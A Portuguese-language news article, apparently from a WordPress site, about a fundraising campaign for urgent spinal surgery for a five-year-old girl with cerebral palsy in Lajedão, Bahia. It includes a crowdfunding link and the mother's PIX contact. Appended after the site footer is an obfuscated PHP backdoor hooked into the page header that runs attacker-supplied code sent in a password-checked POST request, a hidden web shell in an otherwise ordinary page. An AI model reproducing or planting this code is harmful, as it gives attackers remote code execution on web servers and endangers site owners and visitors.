• SEJA BEM-VINDO

Família de criança com paralisia cerebral faz campanha para realizar cirurgia urgente

Publicado em: 02/07/2022 Atualizado:: julho 2, 2022

Malu Passos Martins, 5 anos, moradora de Lajedão. Foto: Arquivo pessoal

 

Essa é Malu Passos Martins, 5 anos, mora na cidade de Lajedão (BA) e tem diagnóstico de paralisia cerebral. A sua condição clínica foi descoberta desde os 6 meses, quando a família iniciou os tratamentos de Fisioterapia, Terapia Ocupacional, Fono e Equoterapia.

 

Malu passou por uma consulta no dia 21 de junho deste ano, com um neurocirurgião, que indicou a cirurgia de risotomia dorsal seletiva. O procedimento neurológico alcança o valor de R$ 90 mil e é realizada na cidade de Teresina (PI).

 

Em busca de uma melhor qualidade de vida pra minha filha Malu. Acredito que mãe alguma gostaria de ver um filho seu se deformando em carácter permanente”, diz a mãe.

 

EXISTE URGÊNCIA NA REALIZAÇÃO DE CIRURGIA?

 

SIM. A resposta considera o quadro clínico da criança, de paralisia cerebral espática (deficiência física), e sabendo que a espacidade evolui com piora progressiva, levando a dor e deformidades graves, como luxação de quadril, deformidades nos pés, postura de flexão de joelhos e de abdução das coxas (padrão em tesoura), gasto energético intenso pela contração mantida (espacidade) – deformando a criança, normalmente de caráter permanente.

 

A orientação é de que a cirurgia seja realizada o mais urgente possível para minimizar as implicações clínicas com a piora progressiva devido à espacidade. Já ocorre o encurtamento de flexores plantares!

 

A família pede a colaboração de todos os amigos, familiares e de todas as pessoas que puderem ajudar formando uma corrente do bem e de solidariedade para que seja possível realizar a o procedimento até o fim do ano.

 

Para fazer parte da história da pequena Malu, entre no link da vaquinha virtual, criada para este fim, através do endereço: https://www.vakinha.com.br/2934971
ou via PIX: (73) 98124-2717 – Joana dos Santos Passos (mãe).

 

 

……………………

 

Fonte: Osollo

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}